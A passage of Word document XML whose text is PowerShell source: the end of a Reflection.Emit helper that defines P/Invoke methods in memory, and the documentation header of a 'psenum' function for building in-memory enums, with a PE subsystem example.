    <w:p w14:paraId="64F204E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3350A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Namespace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0684AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C6B42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TypeHash[$DllName] = $Module.DefineType("$Namespace.$DllName", 'Public,BeforeFieldInit')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234BCCC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB7CE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F393DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527C7F58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E28B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBB9FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7ACE6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="184D987E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Method = $TypeHash[$DllName].DefineMethod(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DFE765" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $FunctionName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD14C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Public,Static,PinvokeImpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3500A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ReturnType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB27490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ParameterTypes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E857E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64C3E9B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Make each ByRef parameter an Out parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE930F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $i = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F089C17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach($Parameter in $ParameterTypes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3859242E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECDBC12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Parameter.IsByRef)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4E3B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FDF62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    [void] $Method.DefineParameter($i, 'Out', $Null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75798385" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B78C1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="098705B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $i++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1D98D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2833BAEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63972BF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DllImport = [Runtime.InteropServices.DllImportAttribute]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E1445" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SetLastErrorField = $DllImport.GetField('SetLastError')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC72BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $CallingConventionField = $DllImport.GetField('CallingConvention')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A5DB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $CharsetField = $DllImport.GetField('CharSet')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59A033" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563AE40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C20B268" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Equivalent to C# version of [DllImport(DllName)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68FBA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8AEE2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF9973" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EA29A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Reflection.FieldInfo[]] @($SetLastErrorField, $CallingConventionField, $CharsetField),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80AEE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [Object[]] @($SLEValue, ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention), ([Runtime.InteropServices.CharSet] $Charset)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2E6A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63167AFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Method.SetCustomAttribute($DllImportAttribute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70792734" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1FA49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BC139" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F40878B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C9F30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893B70C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Module -is [Reflection.Assembly])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E2338E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E0B384" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return $TypeHash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14539C22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66997B46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="291B0BBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ReturnTypes = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E2D4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="083C9C12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach ($Key in $TypeHash.Keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C21C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E799F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Type = $TypeHash[$Key].CreateType()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A830E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B528042" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ReturnTypes[$Key] = $Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F4B74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE7523" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B708AF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return $ReturnTypes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F277B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA4AB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4013D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5145C0AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BFD6EB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function psenum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D08FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719EE032" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770BDBE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFFB23E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1865A41B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Creates an in-memory enumeration for use in your PowerShell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E556066" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C5FF28E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Matthew Graeber (@mattifestation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9390F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EB783" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612E5DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E096836" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFD567" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DABEF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62DBD407" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The 'psenum' function facilitates the creation of enums entirely in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661FE64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        memory using as close to a "C style" as PowerShell will allow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18690C36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11062AD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A64EED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B2EA540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The in-memory module that will host the enum. Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77866934" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        New-InMemoryModule to define an in-memory module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EF1E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7312975C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B45950A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27737AC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The fully-qualified name of the enum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439C51D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="074BB272" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0968C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A0557F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The type of each enum element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C3EB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52CF2E8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER EnumElements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139ADE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CD1C9EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A hashtable of enum elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C0308" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="444D0866" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Bitfield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47F743" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15E5A6C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specifies that the enum should be treated as a bitfield.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263ACC53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38BD44F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AEBFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E0BBD85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Mod = New-InMemoryModule -ModuleName Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33728024" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AAAC356" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414A76A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            UNKNOWN =                  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776759EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            NATIVE =                   1 # Image doesn't require a subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F20A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C5C67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF193E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C45032" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            POSIX_CUI =                7 # Image runs in the Posix character subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345866D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            NATIVE_WINDOWS =           8 # Image is a native Win9x driver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42CB9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689C224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            EFI_APPLICATION =          10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE9A7D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            EFI_BOOT_SERVICE_DRIVER =  11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D87E87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            EFI_RUNTIME_DRIVER =       12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AED50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            EFI_ROM =                  13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EF01F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            XBOX =                     14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B036D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            WINDOWS_BOOT_APPLICATION = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F23E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580E3FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CB6DB37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04AE50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54A00B1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PowerShell purists may disagree with the naming of this function but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6CEB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        again, this was developed in such a way so as to emulate a "C style"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC44BDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        definition as closely as possible. Sorry, I'm not going to name it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F6F3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        New-Enum. :P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B976F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
